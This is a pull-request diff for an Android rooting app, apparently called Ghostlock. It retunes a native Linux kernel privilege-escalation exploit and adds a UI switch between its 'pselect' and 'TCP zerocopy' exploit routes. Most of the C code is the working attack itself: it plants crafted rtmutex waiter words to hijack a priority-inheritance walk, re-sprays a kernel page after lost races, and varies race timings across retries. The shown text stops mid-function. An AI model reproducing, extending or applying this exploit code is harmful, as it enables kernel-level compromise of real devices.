### PR TITLE
pselect: fix compact route on 6.1

### DIFF
--- a/app/src/main/kotlin/com/ghostlock/app/data/AndroidGhostlockRepository.kt
+++ b/app/src/main/kotlin/com/ghostlock/app/data/AndroidGhostlockRepository.kt
@@ -222,17 +222,20 @@ class AndroidGhostlockRepository(context: Context) : GhostlockRepository {
             val binary = File(appContext.applicationInfo.nativeLibraryDir, "libghostlock.so")
             require(binary.isFile) { "missing native binary: ${binary.absolutePath}" }
             if (prepareKsud(workDir, onLog) != null) onLog("ksud ready") else onLog("warning: ksud not found")
-            val ksuLog = File(workDir, KsuLogName)
-            ksuLog.delete()
+            // the root script creates its log as root, so one name per run
+            // keeps the last run's lines out of this run's log
+            val ksuLog = File(workDir, "$KsuLogName.${System.currentTimeMillis()}")
             val nativeLog = File(workDir, ".ghostlock_native.log")
             nativeLog.writeText("")
             val ksuOffset = AtomicLong()
             val nativeOffset = AtomicLong()
+            // tag root-script lines so they cannot be read as the native stages'
+            val ksuSink: (String) -> Unit = { onLog("[ksu] $it") }
             val tailer = Thread {
                 try {
                     while (!Thread.currentThread().isInterrupted) {
                         tailKsuLog(nativeLog, nativeOffset, onLog)
-                        tailKsuLog(ksuLog, ksuOffset, onLog)
+                        tailKsuLog(ksuLog, ksuOffset, ksuSink)
                         Thread.sleep(200)
                     }
                 } catch (_: InterruptedException) {
@@ -251,6 +254,7 @@ class AndroidGhostlockRepository(context: Context) : GhostlockRepository {
                     environment()["GHOSTLOCK_HOME"] = workDir.absolutePath
                     environment()["TMPDIR"] = workDir.absolutePath
                     environment()["HOME"] = workDir.absolutePath
+                    environment()["GHOSTLOCK_KSU_LOG"] = ksuLog.absolutePath
                     if (pair.primary != 0 || pair.consumer != 1) {
                         environment()["GHOSTLOCK_CORE"] = pair.primary.toString()
                         environment()["GHOSTLOCK_CONSUMER_CORE"] = pair.consumer.toString()
@@ -265,7 +269,7 @@ class AndroidGhostlockRepository(context: Context) : GhostlockRepository {
                     tailer.interrupt()
                     tailer.join(1000)
                     tailKsuLog(nativeLog, nativeOffset, onLog)
-                    tailKsuLog(ksuLog, ksuOffset, onLog)
+                    tailKsuLog(ksuLog, ksuOffset, ksuSink)
                 }
             }
         } catch (error: CancellationException) {

--- a/app/src/main/kotlin/com/ghostlock/app/data/AndroidGhostlockRepository.kt
+++ b/app/src/main/kotlin/com/ghostlock/app/data/AndroidGhostlockRepository.kt
@@ -47,6 +47,7 @@ class AndroidGhostlockRepository(context: Context) : GhostlockRepository {
     private val cpuPairLabels = mutableListOf<String>()
     private var selectedCpuPair = 0
     private var safeModeEnabled = false
+    private var tcpRouteEnabled = true
     private var pendingParsedEntries: JSONArray? = null
 
     init {
@@ -63,6 +64,8 @@ class AndroidGhostlockRepository(context: Context) : GhostlockRepository {
         cpuPairLabels = cpuPairLabels.toList(),
         selectedCpuPair = selectedCpuPair,
         safeModeEnabled = safeModeEnabled,
+        tcpRouteEnabled = tcpRouteEnabled,
+        compact = isCompactKernel(),
     )
 
     override fun selectCpuPair(index: Int) {
@@ -76,6 +79,10 @@ class AndroidGhostlockRepository(context: Context) : GhostlockRepository {
 
     override fun setSafeModeEnabled(enabled: Boolean) {
         safeModeEnabled = enabled
+    }
+
+    override fun setTcpRouteEnabled(enabled: Boolean) {
+        tcpRouteEnabled = enabled
     }
 
     override suspend fun exportCandidates(): List<OffsetCandidate> {
@@ -249,6 +256,7 @@ class AndroidGhostlockRepository(context: Context) : GhostlockRepository {
                         environment()["GHOSTLOCK_CONSUMER_CORE"] = pair.consumer.toString()
                     }
                     if (safeModeEnabled) environment()["GHOSTLOCK_DISABLE_MODULES"] = "1"
+                    if (!tcpRouteEnabled) environment()["GHOSTLOCK_TCP_ROUTE"] = "0"
                 }
             try {
                 runProcess(command, onLog = {}, captureOutput = false)
@@ -365,6 +373,17 @@ class AndroidGhostlockRepository(context: Context) : GhostlockRepository {
     private fun isKernelSupported(): Boolean {
         val version = System.getProperty("os.version", "").orEmpty()
         return version in SupportedKernels.UNAMES || importedOffsetsMatch(version)
+    }
+
+    private fun isCompactKernel(): Boolean {
+        val version = System.getProperty("os.version", "").orEmpty()
+        // an imported entry for this release overrides the built-in one, as in select_offsets
+        val entries = readOffsetsFile(offsetsFile)
+        for (index in 0 until (entries?.length() ?: 0)) {
+            val entry = entries?.optJSONObject(index) ?: continue
+            if (entry.optString("release", "") == version) return entry.optLong("compact_waiter", 0L) != 0L
+        }
+        return SupportedKernels.BUILTIN[version]?.get("compact_waiter")?.takeIf { it != 0L } != null
     }
 
     private fun importedOffsetsMatch(version: String): Boolean {

--- a/app/src/main/kotlin/com/ghostlock/app/data/AndroidGhostlockRepository.kt
+++ b/app/src/main/kotlin/com/ghostlock/app/data/AndroidGhostlockRepository.kt
@@ -381,13 +381,15 @@ class AndroidGhostlockRepository(context: Context) : GhostlockRepository {
 
     private fun isCompactKernel(): Boolean {
         val version = System.getProperty("os.version", "").orEmpty()
-        // an imported entry for this release overrides the built-in one, as in select_offsets
+        // an imported entry overrides the built-in one, a member it omits keeps the built-in
+        // value, as in select_offsets. first match wins, same as load_offsets_json
         val entries = readOffsetsFile(offsetsFile)
-        for (index in 0 until (entries?.length() ?: 0)) {
-            val entry = entries?.optJSONObject(index) ?: continue
-            if (entry.optString("release", "") == version) return entry.optLong("compact_waiter", 0L) != 0L
-        }
-        return SupportedKernels.BUILTIN[version]?.get("compact_waiter")?.takeIf { it != 0L } != null
+        val imported = (0 until (entries?.length() ?: 0))
+            .mapNotNull { entries?.optJSONObject(it) }
+            .firstOrNull { it.optString("release", "") == version }
+            ?.let { toKernelOffsets(it).scalars["compact_waiter"] }
+        val value = imported ?: SupportedKernels.BUILTIN[version]?.get("compact_waiter")
+        return value != null && value != 0L
     }
 
     private fun importedOffsetsMatch(version: String): Boolean {

--- a/app/src/main/kotlin/com/ghostlock/app/domain/model/GhostlockModels.kt
+++ b/app/src/main/kotlin/com/ghostlock/app/domain/model/GhostlockModels.kt
@@ -13,6 +13,8 @@ data class KernelSnapshot(
     val cpuPairLabels: List<String>,
     val selectedCpuPair: Int,
     val safeModeEnabled: Boolean,
+    val tcpRouteEnabled: Boolean,
+    val compact: Boolean,
 )
 
 enum class LogTone { Default, Error, Success, Warning, Progress }

--- a/app/src/main/kotlin/com/ghostlock/app/domain/repository/GhostlockRepository.kt
+++ b/app/src/main/kotlin/com/ghostlock/app/domain/repository/GhostlockRepository.kt
@@ -13,6 +13,8 @@ interface GhostlockRepository {
 
     fun setSafeModeEnabled(enabled: Boolean)
 
+    fun setTcpRouteEnabled(enabled: Boolean)
+
     suspend fun exportCandidates(): List<OffsetCandidate>
 
     suspend fun importOffsets(json: String): OffsetImportResult

--- a/app/src/main/kotlin/com/ghostlock/app/domain/usecase/FormatLogUseCase.kt
+++ b/app/src/main/kotlin/com/ghostlock/app/domain/usecase/FormatLogUseCase.kt
@@ -6,15 +6,17 @@ import com.ghostlock.app.domain.model.LogTone
 class FormatLogUseCase {
     operator fun invoke(line: String): LogEntry {
         val text = stripAnsi(if (line.endsWith('\n')) line else "$line\n")
-        val marker = text.getOrNull(1).takeIf { text.startsWith('[') && text.getOrNull(2) == ']' }
-        val message = text.replace(leadingTags, "").removePrefix("=== ")
+        // a source tag such as [ksu] hides the marker that follows it
+        val body = text.replaceFirst(sourceTag, "")
+        val marker = body.getOrNull(1).takeIf { body.startsWith('[') && body.getOrNull(2) == ']' }
+        val message = body.replace(leadingTags, "").removePrefix("=== ")
         val tone = when {
             isWriteRound(message) -> if (marker == '-' || marker == '!') LogTone.Error else LogTone.Progress
             marker == '+' -> LogTone.Success
             marker == '-' || marker == '!' -> LogTone.Error
             marker == '*' -> LogTone.Warning
-            text.startsWith("error", ignoreCase = true) -> LogTone.Error
-            text.startsWith("warning", ignoreCase = true) -> LogTone.Warning
+            body.startsWith("error", ignoreCase = true) -> LogTone.Error
+            body.startsWith("warning", ignoreCase = true) -> LogTone.Warning
             else -> LogTone.Default
         }
         return LogEntry(text, tone)
@@ -27,6 +29,7 @@ class FormatLogUseCase {
 
     private companion object {
         val ansi = Regex("\\u001B\\[[;\\d]*m")
+        val sourceTag = Regex("^\\[[a-z]+\\]\\s+")
         val leadingTags = Regex("^(\\[[^]]+\\]\\s*)+")
     }
 }

--- a/app/src/main/kotlin/com/ghostlock/app/ui/GhostlockUi.kt
+++ b/app/src/main/kotlin/com/ghostlock/app/ui/GhostlockUi.kt
@@ -101,6 +101,8 @@ data class GhostlockUiState(
     val cpuPairLabels: List<String> = emptyList(),
     val cpuPairIndex: Int = 0,
     val safeModeEnabled: Boolean = false,
+    val tcpRouteEnabled: Boolean = true,
+    val compact: Boolean = false,
     val executionSheetVisible: Boolean = false,
     val executionSheetDismissible: Boolean = false,
     val dialogVisible: Boolean = false,
@@ -132,6 +134,7 @@ interface GhostlockActions {
     fun onExportOffsets()
     fun onCpuPairSelected(index: Int)
     fun onSafeModeChanged(enabled: Boolean)
+    fun onTcpRouteChanged(enabled: Boolean)
     fun onDialogItemSelected(index: Int)
     fun onDialogInputChange(value: String)
     fun onDialogConfirm(value: String)
@@ -561,6 +564,16 @@ private fun ControlPanel(
                 title = stringResource(R.string.safe_mode_label),
                 summary = stringResource(R.string.safe_mode_summary),
             )
+        }
+        if (state.compact) {
+            Card(modifier = modifier.padding(top = 12.dp)) {
+                SwitchPreference(
+                    checked = state.tcpRouteEnabled,
+                    onCheckedChange = actions::onTcpRouteChanged,
+                    title = stringResource(R.string.tcp_route_label),
+                    summary = stringResource(if (state.tcpRouteEnabled) R.string.tcp_route_summary_on else R.string.tcp_route_summary_off),
+                )
+            }
         }
         AnimatedVisibility(
             visible = state.advancedVisible,

--- a/app/src/main/kotlin/com/ghostlock/app/ui/GhostlockViewModel.kt
+++ b/app/src/main/kotlin/com/ghostlock/app/ui/GhostlockViewModel.kt
@@ -85,6 +85,11 @@ class GhostlockViewModel(
         mutableState.update { it.copy(safeModeEnabled = enabled) }
     }
 
+    fun toggleTcpRoute(enabled: Boolean) {
+        repository.setTcpRouteEnabled(enabled)
+        mutableState.update { it.copy(tcpRouteEnabled = enabled) }
+    }
+
     fun onRun() {
         val snapshot = kernelSnapshot ?: return
         if (!snapshot.kernelSupported) {
@@ -231,6 +236,8 @@ class GhostlockViewModel(
                 cpuPairLabels = snapshot.cpuPairLabels,
                 cpuPairIndex = snapshot.selectedCpuPair,
                 safeModeEnabled = snapshot.safeModeEnabled,
+                tcpRouteEnabled = snapshot.tcpRouteEnabled,
+                compact = snapshot.compact,
                 exportVisible = canExport,
             )
         }

--- a/app/src/main/kotlin/com/ghostlock/app/ui/MainActivity.kt
+++ b/app/src/main/kotlin/com/ghostlock/app/ui/MainActivity.kt
@@ -118,6 +118,7 @@ private fun GhostlockRoute(
             override fun onExportOffsets() = viewModel.exportOffsets()
             override fun onCpuPairSelected(index: Int) = viewModel.selectCpuPair(index)
             override fun onSafeModeChanged(enabled: Boolean) = viewModel.toggleSafeMode(enabled)
+            override fun onTcpRouteChanged(enabled: Boolean) = viewModel.toggleTcpRoute(enabled)
             override fun onDialogItemSelected(index: Int) = viewModel.onDialogItemSelected(index)
             override fun onDialogInputChange(value: String) = viewModel.onDialogInputChange(value)
             override fun onDialogConfirm(value: String) = viewModel.onDialogConfirm(value)

--- a/app/src/main/res/values-zh/strings.xml
+++ b/app/src/main/res/values-zh/strings.xml
@@ -52,4 +52,7 @@
     <string name="cpu_pair_label">CPU 核心组</string>
     <string name="safe_mode_label">安全模式</string>
     <string name="safe_mode_summary">禁用所有模块</string>
+    <string name="tcp_route_label">利用路径</string>
+    <string name="tcp_route_summary_on">TCP 零拷贝</string>
+    <string name="tcp_route_summary_off">pselect</string>
 </resources>

--- a/app/src/main/res/values/strings.xml
+++ b/app/src/main/res/values/strings.xml
@@ -52,4 +52,7 @@
     <string name="cpu_pair_label">CPU cores</string>
     <string name="safe_mode_label">Safe mode</string>
     <string name="safe_mode_summary">Disable all modules</string>
+    <string name="tcp_route_label">Exploit route</string>
+    <string name="tcp_route_summary_on">TCP zerocopy</string>
+    <string name="tcp_route_summary_off">pselect</string>
 </resources>

--- a/src/core/common.h
+++ b/src/core/common.h
@@ -193,6 +193,7 @@ int prepare_skb_payload(uintptr_t base);
 uintptr_t prepare_kernel_page(void);
 uintptr_t prepare_good_kernel_page(void);
 
+void log_sync(void);
 void fdset_put_word(fd_set *set, int word, uint64_t value);
 uint64_t fdset_get_word(const fd_set *set, int word);
 int tcp_route_selected(void);

--- a/src/core/fops.c
+++ b/src/core/fops.c
@@ -130,7 +130,7 @@ void do_tcp_fake_lock_route(void) {
   if (!page_base || !fake_lock || !fake_fops) {
     route_last_step = 40;
     route_last_errno = 0;
-    pr_error("tcp route missing page=%016zx lock=%016zx fops=%016zx\n",
+    pr_warning("tcp route missing page=%016zx lock=%016zx fops=%016zx\n",
              page_base, fake_lock, fake_fops);
     return;
   }
@@ -146,7 +146,7 @@ void do_tcp_fake_lock_route(void) {
   if (tcp_make_pair(&client_fd, &server_fd) != 0) {
     route_last_step = 41;
     route_last_errno = errno;
-    pr_error("tcp route pair setup failed errno=%d\n", errno);
+    pr_warning("tcp route pair setup failed errno=%d\n", errno);
     return;
   }
 
@@ -156,7 +156,7 @@ void do_tcp_fake_lock_route(void) {
       fallocate(punch_fd, 0, 0, TCP_PUNCH_SHMEM_LEN) != 0) {
     route_last_step = 42;
     route_last_errno = errno;
-    pr_error("tcp route memfd/fallocate errno=%d\n", errno);
+    pr_warning("tcp route memfd/fallocate errno=%d\n", errno);
     goto out;
   }
   map = mmap(NULL, TCP_PUNCH_SHMEM_LEN, PROT_READ | PROT_WRITE,
@@ -164,7 +164,7 @@ void do_tcp_fake_lock_route(void) {
   if (map == MAP_FAILED) {
     route_last_step = 43;
     route_last_errno = errno;
-    pr_error("tcp route mmap errno=%d\n", errno);
+    pr_warning("tcp route mmap errno=%d\n", errno);
     goto out;
   }
   for (size_t off = 0; off < TCP_PUNCH_SHMEM_LEN; off += page_size) {
@@ -183,7 +183,7 @@ void do_tcp_fake_lock_route(void) {
   if (pthread_create(&puncher, NULL, tcp_punch_thread, &state) != 0) {
     route_last_step = 44;
     route_last_errno = errno;
-    pr_error("tcp route punch thread errno=%d\n", errno);
+    pr_warning("tcp route punch thread errno=%d\n", errno);
     goto out;
   }
   puncher_started = 1;
@@ -221,7 +221,7 @@ void do_tcp_fake_lock_route(void) {
     if (atomic_load(&tcp_punch_failed)) {
       route_last_step = 46;
       route_last_errno = atomic_load(&tcp_punch_failed);
-      pr_error("tcp route puncher failed errno=%d\n", route_last_errno);
+      pr_warning("tcp route puncher failed errno=%d\n", route_last_errno);
       break;
     }
 
@@ -496,7 +496,7 @@ void do_pselect_fake_lock_route(void) {
   if (!page_base || !fake_lock || !fake_fops) {
     route_last_step = 30;
     route_last_errno = 0;
-    pr_error("pselect route missing kernel page base=%016zx lock=%016zx fops=%016zx\n",
+    pr_warning("pselect route missing kernel page base=%016zx lock=%016zx fops=%016zx\n",
              page_base, fake_lock, fake_fops);
     return;
   }
@@ -525,7 +525,7 @@ void do_pselect_fake_lock_route(void) {
       if (!page_base || !fake_lock || !fake_fops) {
         route_last_step = 35;
         route_last_errno = errno;
-        pr_error("pselect retry page prepare failed attempt=%d\n", attempt);
+        pr_warning("pselect retry page prepare failed attempt=%d\n", attempt);
         break;
       }
     }
@@ -542,7 +542,7 @@ void do_pselect_fake_lock_route(void) {
     if (high_read < 0) {
       route_last_step = 31;
       route_last_errno = errno;
-      pr_error("pselect F_DUPFD read errno=%d\n", errno);
+      pr_warning("pselect F_DUPFD read errno=%d\n", errno);
       if (block_fd != pipefd[0]) {
         close(block_fd);
       }
@@ -640,7 +640,7 @@ void do_pselect_fake_lock_route(void) {
       /* stuck in sched_setattr or futex, closing would reclaim objects its
        * syscall still uses, leak and let process exit reclaim them */
       route_last_step = 34;
-      pr_error("pselect consumer still inflight, leaking route fds\n");
+      pr_warning("pselect consumer still inflight, leaking route fds\n");
       leak_fds = 1;
       break;
     }

--- a/src/core/fops.c
+++ b/src/core/fops.c
@@ -444,14 +444,17 @@ void prepare_pselect_fdsets(fd_set *in, fd_set *out, fd_set *ex) {
   if (compact) {
     /* 6.1 compact write route (Root-My-Pixel-Payloads src/61/fops.c): tree/pi parents carry
      * the write value, children the write target; waiter->task is the
-     * payload fake_task (planted fields for the PI walk). */
+     * payload fake_task (planted fields for the PI walk). Value writes relink
+     * left-only at the target, or the erase rebalance walks the target page. */
+    uint64_t relink_pc = fake_right ? fake_right : fake_parent;
+    uint64_t relink_left = fake_right ? pselect_custom_target : fake_left;
     struct pselect_waiter_word words[] = {
-      {2, fake_right, "tree_pc"},
+      {2, relink_pc, "tree_pc"},
       {3, 0, "tree_right"},
-      {4, pselect_custom_target, "tree_left"},
-      {5, fake_right, "pi_pc"},
+      {4, relink_left, "tree_left"},
+      {5, relink_pc, "pi_pc"},
       {6, 0, "pi_right"},
-      {7, pselect_custom_target, "pi_left"},
+      {7, relink_left, "pi_left"},
       {8, fake_task, "task"},
       {9, fake_lock, "lock"},
       {10, ((uint64_t)FAKE_WAITER_PRIO << 32) | 3, "wake_prio"},

--- a/src/core/fops.c
+++ b/src/core/fops.c
@@ -16,6 +16,7 @@ int route_last_errno;
  * zc words overlap the stale waiter; zc[0x28] is waiter->task, zc[0x30]
  * waiter->lock. */
 #define TCP_PUNCH_SHMEM_LEN (16 * 1024 * 1024)
+/* caps a route that never wins so a lost run does not spend the app timeout */
 #define TCP_ROUTE_ATTEMPTS 128
 #define TCP_ARM_SEQ 16
 #define TCP_POST_GETSOCKOPT_HOLD 20000
@@ -516,12 +517,13 @@ void do_pselect_fake_lock_route(void) {
   int calls = 0;
   int success = 0;
   int winner = 0;
+  int leak_fds = 0;
   for (int attempt = 1; attempt <= attempts; attempt++) {
     if (compact_route && attempt > 1) {
       /* lost race clobbers the page, respray re-derives fake_* too */
       page_base = prepare_good_kernel_page();
       if (!page_base || !fake_lock || !fake_fops) {
-        route_last_step = 34;
+        route_last_step = 35;
         route_last_errno = errno;
         pr_error("pselect retry page prepare failed attempt=%d\n", attempt);
         break;
@@ -639,6 +641,7 @@ void do_pselect_fake_lock_route(void) {
        * syscall still uses, leak and let process exit reclaim them */
       route_last_step = 34;
       pr_error("pselect consumer still inflight, leaking route fds\n");
+      leak_fds = 1;
       break;
     }
     if (block_fd != pipefd[0]) {
@@ -650,8 +653,10 @@ void do_pselect_fake_lock_route(void) {
     }
   }
 
-  close(pipefd[0]);
-  close(pipefd[1]);
+  if (!leak_fds) {
+    close(pipefd[0]);
+    close(pipefd[1]);
+  }
 
   pr_info("pselect route done calls=%d success=%d step=%d errno=%d\n",
           calls, success, route_last_step, route_last_errno);

--- a/src/core/fops.c
+++ b/src/core/fops.c
@@ -566,6 +566,7 @@ void do_pselect_fake_lock_route(void) {
             (unsigned long long)fdset_get_word(&ex, 1),
             (unsigned long long)fdset_get_word(&ex, 2),
             (unsigned long long)fdset_get_word(&ex, 3));
+    log_sync();
 
     /* The route may replace low fds, including stdout and stderr. */
     reserve_standard_io();

--- a/src/core/fops.c
+++ b/src/core/fops.c
@@ -16,9 +16,11 @@ int route_last_errno;
  * zc words overlap the stale waiter; zc[0x28] is waiter->task, zc[0x30]
  * waiter->lock. */
 #define TCP_PUNCH_SHMEM_LEN (16 * 1024 * 1024)
-#define TCP_ROUTE_ATTEMPTS 2000
+#define TCP_ROUTE_ATTEMPTS 128
 #define TCP_ARM_SEQ 16
 #define TCP_POST_GETSOCKOPT_HOLD 20000
+/* compact pselect retry */
+#define PSELECT_CFI_ROUTE_ATTEMPTS 4
 
 struct tcp_punch_state {
   int fd;
@@ -256,6 +258,7 @@ void do_tcp_fake_lock_route(void) {
     }
     /* consumer fired: the PI walk derefed the crafted waiter and wrote.
      * stages verify their own effects; no cfi stage here. */
+    pr_info("tcp route won seq=%d\n", i);
     route_ok = 1;
     route_last_step = 0;
     route_last_errno = 0;
@@ -291,10 +294,39 @@ out:
 }
 
 static int route_delay_usec(int attempt) {
-  (void)attempt;
-  /* Both routes: let select/pselect establish its frame and stamp the
-   * crafted waiter before the PI walk fires. */
-  return PSELECT_ENTER_DELAY_USEC;
+  if (!(active_offsets && active_offsets->compact_waiter)) {
+    (void)attempt;
+    /* let select set up its stack frame before the PI walk */
+    return PSELECT_ENTER_DELAY_USEC;
+  }
+  const char *forced = getenv("PSELECT_DELAY_USEC");
+  if (forced && *forced) {
+    char *end = NULL;
+    long value = strtol(forced, &end, 0);
+    if (end != forced && !*end && value >= 0 && value <= 2000000) {
+      return (int)value;
+    }
+  }
+  static const int delays[] = {
+    50000, 30000, 70000, 10000, 100000, 150000, 20000, 120000,
+  };
+  return delays[(attempt - 1) % 8];
+}
+
+static void compact_timeout_values(long *sec, long *usec) {
+  *sec = 1;
+  *usec = 0;
+  const char *s = getenv("PSELECT_TIMEOUT_OVERRIDE_USEC");
+  if (!s || !*s) {
+    return;
+  }
+  char *end = NULL;
+  errno = 0;
+  long value = strtol(s, &end, 0);
+  if (!errno && end != s && !*end && value >= 0) {
+    *sec = value / 1000000;
+    *usec = value % 1000000;
+  }
 }
 
 void fdset_put_word(fd_set *set, int word, uint64_t value) {
@@ -467,131 +499,155 @@ void do_pselect_fake_lock_route(void) {
 
   struct timespec route_t0;
   clock_gettime(CLOCK_MONOTONIC, &route_t0);
-  int calls = 0;
-  int success = 0;
   int pipefd[2];
   SYSCHK(pipe(pipefd));
 
   int compact_route = active_offsets && active_offsets->compact_waiter;
-
-  /* Both routes park on a never-ready timerfd: the waiter must stay stale
-   * on the pselect stack for the whole consumer window. */
-  int block_fd = (int)syscall(SYS_timerfd_create, CLOCK_MONOTONIC, 0);
-  if (block_fd < 0) {
-    pr_warning("pselect timerfd_create failed errno=%d; using pipe read end\n",
-               errno);
-    block_fd = pipefd[0];
-  }
-  int high_read = fcntl(block_fd, F_DUPFD, PSELECT_ROUTE_NFDS + 16);
-  if (high_read < 0) {
-    route_last_step = 31;
-    route_last_errno = errno;
-    pr_error("pselect F_DUPFD read errno=%d\n", errno);
-    if (block_fd != pipefd[0]) {
-      close(block_fd);
-    }
-    close(pipefd[0]);
-    close(pipefd[1]);
-    return;
-  }
-
-  fd_set in;
-  fd_set out;
-  fd_set ex;
-  prepare_pselect_fdsets(&in, &out, &ex);
-  pr_info("pselect route setup shift=%d page=%016zx "
-          "fake_lock=%016zx fake_w0=%016zx fake_task=%016zx "
-          "in0=%016llx in3=%016llx out0=%016llx ex0=%016llx "
-          "ex1=%016llx ex2=%016llx ex3=%016llx\n",
-          pselect_waiter_shift(),
-          page_base, fake_lock, fake_w0, fake_task,
-          (unsigned long long)fdset_get_word(&in, 0),
-          (unsigned long long)fdset_get_word(&in, 3),
-          (unsigned long long)fdset_get_word(&out, 0),
-          (unsigned long long)fdset_get_word(&ex, 0),
-          (unsigned long long)fdset_get_word(&ex, 1),
-          (unsigned long long)fdset_get_word(&ex, 2),
-          (unsigned long long)fdset_get_word(&ex, 3));
-
-  /* The route may replace low fds, including stdout and stderr. */
-  reserve_standard_io();
-  open_selected_fds(&in, &out, &ex, high_read, pipefd[1]);
-  close(high_read);
-
-  atomic_store(&consumer_calls, 0);
-  atomic_store(&consumer_success, 0);
-  atomic_store(&punch_consume_stop, 0);
-  int delay_usec = route_delay_usec(1);
-  atomic_store(&main_route_delay_usec, delay_usec);
-  atomic_store(&punch_consume_go, 1);
-
-  pr_info("pselect pre-select compact=%d +%.0fms\n", compact_route,
-          fops_elapsed_ms(&route_t0));
-  errno = 0;
-  int ret;
+  int attempts = compact_route ? PSELECT_CFI_ROUTE_ATTEMPTS : 1;
+  long compact_timeout_sec;
+  long compact_timeout_usec;
   if (compact_route) {
-    struct timespec ts = {
-      .tv_sec = PSELECT_TIMEOUT_SEC,
-      .tv_nsec = (long)PSELECT_TIMEOUT_USEC * 1000,
-    };
-    ret = pselect(PSELECT_ROUTE_NFDS, &in, &out, &ex, &ts, NULL);
-  } else {
-    /* 6.6: select() with a {0, 200ms} timeout. */
-    struct timeval timeout = {
-      .tv_sec = PSELECT_TIMEOUT_SEC,
-#ifdef PSELECT_TIMEOUT_USEC
-      .tv_usec = PSELECT_TIMEOUT_USEC,
-#else
-      .tv_usec = 0,
-#endif
-    };
-    ret = select(PSELECT_ROUTE_NFDS, &in, &out, &ex, &timeout);
+    compact_timeout_values(&compact_timeout_sec, &compact_timeout_usec);
   }
-  int saved_errno = errno;
-  restore_standard_io();
-  pr_info("pselect post-select compact=%d +%.0fms ret=%d\n", compact_route,
-          fops_elapsed_ms(&route_t0), ret);
-  atomic_store(&punch_consume_go, 0);
 
-  /* Root-My-Galaxy slide_pselect_stack_copy: when the consumer entered sched_setattr,
-   * wait for it to finish before tearing the fds down. The PI walk runs on
-   * the consumer's CPU and we must not close/reclaim the block fds while it
-   * still holds the crafted waiter on the stack. */
-  int consumer_stuck = 0;
-  if (atomic_load(&consumer_inflight) != 0) {
-    for (int i = 0; i < 2000 && atomic_load(&consumer_inflight) != 0; i++) {
-      usleep(1000);
+  int calls = 0;
+  int success = 0;
+  int winner = 0;
+  for (int attempt = 1; attempt <= attempts; attempt++) {
+    if (compact_route && attempt > 1) {
+      /* lost race clobbers the page, respray re-derives fake_* too */
+      page_base = prepare_good_kernel_page();
+      if (!page_base || !fake_lock || !fake_fops) {
+        route_last_step = 34;
+        route_last_errno = errno;
+        pr_error("pselect retry page prepare failed attempt=%d\n", attempt);
+        break;
+      }
     }
-    consumer_stuck = atomic_load(&consumer_inflight) != 0;
-  }
 
-  calls = atomic_load(&consumer_calls);
-  success = atomic_load(&consumer_success);
-  pr_info("pselect returned ret=%d errno=%d calls=%d success=%d delay=%d\n",
-          ret, saved_errno, calls, success, delay_usec);
+    /* park on a never-ready timerfd so the waiter stays stale on the
+     * pselect stack for the consumer window */
+    int block_fd = (int)syscall(SYS_timerfd_create, CLOCK_MONOTONIC, 0);
+    if (block_fd < 0) {
+      pr_warning("pselect timerfd_create failed errno=%d; using pipe read end\n",
+                 errno);
+      block_fd = pipefd[0];
+    }
+    int high_read = fcntl(block_fd, F_DUPFD, PSELECT_ROUTE_NFDS + 16);
+    if (high_read < 0) {
+      route_last_step = 31;
+      route_last_errno = errno;
+      pr_error("pselect F_DUPFD read errno=%d\n", errno);
+      if (block_fd != pipefd[0]) {
+        close(block_fd);
+      }
+      close(pipefd[0]);
+      close(pipefd[1]);
+      return;
+    }
 
-  if (calls > 0 && success > 0) {
-    route_last_step = 0;
-    route_last_errno = 0;
-  } else {
-    route_last_step = 33;
-    route_last_errno = saved_errno;
-  }
+    fd_set in;
+    fd_set out;
+    fd_set ex;
+    prepare_pselect_fdsets(&in, &out, &ex);
+    pr_info("pselect route setup attempt=%d/%d shift=%d page=%016zx "
+            "fake_lock=%016zx fake_w0=%016zx fake_task=%016zx "
+            "in0=%016llx in3=%016llx out0=%016llx ex0=%016llx "
+            "ex1=%016llx ex2=%016llx ex3=%016llx\n",
+            attempt, attempts, pselect_waiter_shift(),
+            page_base, fake_lock, fake_w0, fake_task,
+            (unsigned long long)fdset_get_word(&in, 0),
+            (unsigned long long)fdset_get_word(&in, 3),
+            (unsigned long long)fdset_get_word(&out, 0),
+            (unsigned long long)fdset_get_word(&ex, 0),
+            (unsigned long long)fdset_get_word(&ex, 1),
+            (unsigned long long)fdset_get_word(&ex, 2),
+            (unsigned long long)fdset_get_word(&ex, 3));
 
-  /* open_selected_fds only closes its own F_DUPFD copy */
-  if (consumer_stuck) {
-    /* The consumer never came back from sched_setattr/futex. Closing would
-     * reclaim pipe objects its in-flight syscall still references, so leak
-     * them instead and let process exit reclaim. */
-    route_last_step = 34;
-    pr_error("pselect consumer still inflight; leaking route fds\n");
-  } else {
+    /* The route may replace low fds, including stdout and stderr. */
+    reserve_standard_io();
+    open_selected_fds(&in, &out, &ex, high_read, pipefd[1]);
+    close(high_read);
+
+    atomic_store(&consumer_calls, 0);
+    atomic_store(&consumer_success, 0);
+    atomic_store(&punch_consume_stop, 0);
+    int delay_usec = route_delay_usec(attempt);
+    atomic_store(&main_route_delay_usec, delay_usec);
+    atomic_store(&punch_consume_go, attempt);
+
+    pr_info("pselect pre-select attempt=%d/%d compact=%d +%.0fms\n",
+            attempt, attempts, compact_route, fops_elapsed_ms(&route_t0));
+    errno = 0;
+    int ret;
+    if (compact_route) {
+      struct timespec ts = {
+        .tv_sec = compact_timeout_sec,
+        .tv_nsec = compact_timeout_usec * 1000,
+      };
+      ret = pselect(PSELECT_ROUTE_NFDS, &in, &out, &ex, &ts, NULL);
+    } else {
+      /* non-compact stays on select with its 200ms timeout */
+      struct timeval timeout = {
+        .tv_sec = PSELECT_TIMEOUT_SEC,
+#ifdef PSELECT_TIMEOUT_USEC
+        .tv_usec = PSELECT_TIMEOUT_USEC,
+#else
+        .tv_usec = 0,
+#endif
+      };
+      ret = select(PSELECT_ROUTE_NFDS, &in, &out, &ex, &timeout);
+    }
+    int saved_errno = errno;
+    restore_standard_io();
+    pr_info("pselect post-select attempt=%d/%d compact=%d +%.0fms ret=%d\n",
+            attempt, attempts, compact_route, fops_elapsed_ms(&route_t0), ret);
+    atomic_store(&punch_consume_go, 0);
+
+    /* RMGP pattern, wait out the consumer before closing the fds. The PI walk
+     * runs on its CPU with the crafted waiter on the stack */
+    int consumer_stuck = 0;
+    if (atomic_load(&consumer_inflight) != 0) {
+      for (int i = 0; i < 2000 && atomic_load(&consumer_inflight) != 0; i++) {
+        usleep(1000);
+      }
+      consumer_stuck = atomic_load(&consumer_inflight) != 0;
+    }
+
+    calls = atomic_load(&consumer_calls);
+    success = atomic_load(&consumer_success);
+    pr_info("pselect returned attempt=%d/%d ret=%d errno=%d calls=%d "
+            "success=%d delay=%d\n",
